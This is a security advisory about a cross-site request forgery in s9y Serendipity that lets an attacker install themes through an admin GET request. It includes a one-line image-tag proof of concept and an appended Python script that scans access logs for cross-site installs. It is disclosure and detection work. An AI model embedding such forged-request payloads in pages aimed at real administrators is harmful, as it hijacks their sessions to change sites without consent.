s9y Serendipity Cross Site Request Forgery

2017.04.12
Credit: Zhiyang Zeng
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

Details
=======
Software: s9y Serendipity
Version: <2.0.5
Homepage: https://docs.s9y.org/

Description
===========
A GET-type CSRF in Serendipity allows an attacker to install any theme: the template-install admin action is reachable through a plain GET request and carries no anti-CSRF token.

POC
===
Include this in a page; when an authenticated administrator loads it, the install is triggered:

<img src="http://127.0.0.1/serendipity/serendipity_admin.php?serendipity%5BadminModule%5D=templates&serendipity%5BadminAction%5D=install&serendipity%5Btheme%5D=bartleby&serendipity%5Bspartacus_fetch%5D=bartlebya">

Mitigations
===========
Update to Serendipity v2.1.x

FIX
===
https://github.com/s9y/Serendipity/issues/452

Best regards,
Zhiyang Zeng of Tencent security platform department
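A defender-side check for this issue, added here as an example and not part of the advisory: it scans web server access logs (Apache combined format) for GET requests to the template-install admin action described above and reports the ones whose Referer is missing or belongs to another host, which is the trace a CSRF-triggered install leaves behind. The log lines, host names and IPs are constructed; only the URL parameters come from the advisory.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample access-log lines (Apache "combined" format), not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Apr/2017:10:01:07 +0200] "GET /serendipity/serendipity_admin.php?serendipity%5BadminModule%5D=templates&serendipity%5BadminAction%5D=install&serendipity%5Btheme%5D=bartleby HTTP/1.1" 200 512 "http://attacker.example/lure.html" "Mozilla/5.0"
10.0.0.7 - - [12/Apr/2017:10:02:11 +0200] "GET /serendipity/serendipity_admin.php?serendipity%5BadminModule%5D=templates&serendipity%5BadminAction%5D=install&serendipity%5Btheme%5D=bulletin HTTP/1.1" 200 512 "http://blog.example/serendipity/serendipity_admin.php" "Mozilla/5.0"
10.0.0.9 - - [12/Apr/2017:10:03:45 +0200] "GET /serendipity/index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# One combined-format log line: ip, identd, user, [timestamp], "METHOD path proto", status, bytes, "referer", "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

def is_admin_install(path):
    """True if the request is the templates/install admin action from the advisory.
    parse_qs percent-decodes the keys, so %5B...%5D becomes [...]."""
    parsed = urlparse(path)
    if not parsed.path.endswith("/serendipity_admin.php"):
        return False
    qs = parse_qs(parsed.query)
    return (qs.get("serendipity[adminModule]") == ["templates"]
            and qs.get("serendipity[adminAction]") == ["install"])

def find_cross_site_installs(log_text, site_host):
    """Return (ip, theme, referer) for GET theme installs whose Referer is absent
    or from a host other than site_host. A missing Referer is flagged too, since
    browsers and privacy settings may suppress it on cross-site requests."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m["method"] != "GET" or not is_admin_install(m["path"]):
            continue
        ref_host = urlparse(m["referer"]).hostname if m["referer"] != "-" else None
        if ref_host == site_host:
            continue  # same-origin navigation from the admin UI itself
        theme = parse_qs(urlparse(m["path"]).query).get("serendipity[theme]", ["?"])[0]
        hits.append((m["ip"], theme, m["referer"]))
    return hits

if __name__ == "__main__":
    for ip, theme, referer in find_cross_site_installs(SAMPLE_LOG, "blog.example"):
        print(f"suspicious theme install from {ip}: theme={theme} referer={referer}")
```

On the constructed sample the first line is reported (install triggered from attacker.example) while the same-origin install and the unrelated index.php request are not.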


Copyright 2017, cxsecurity.com
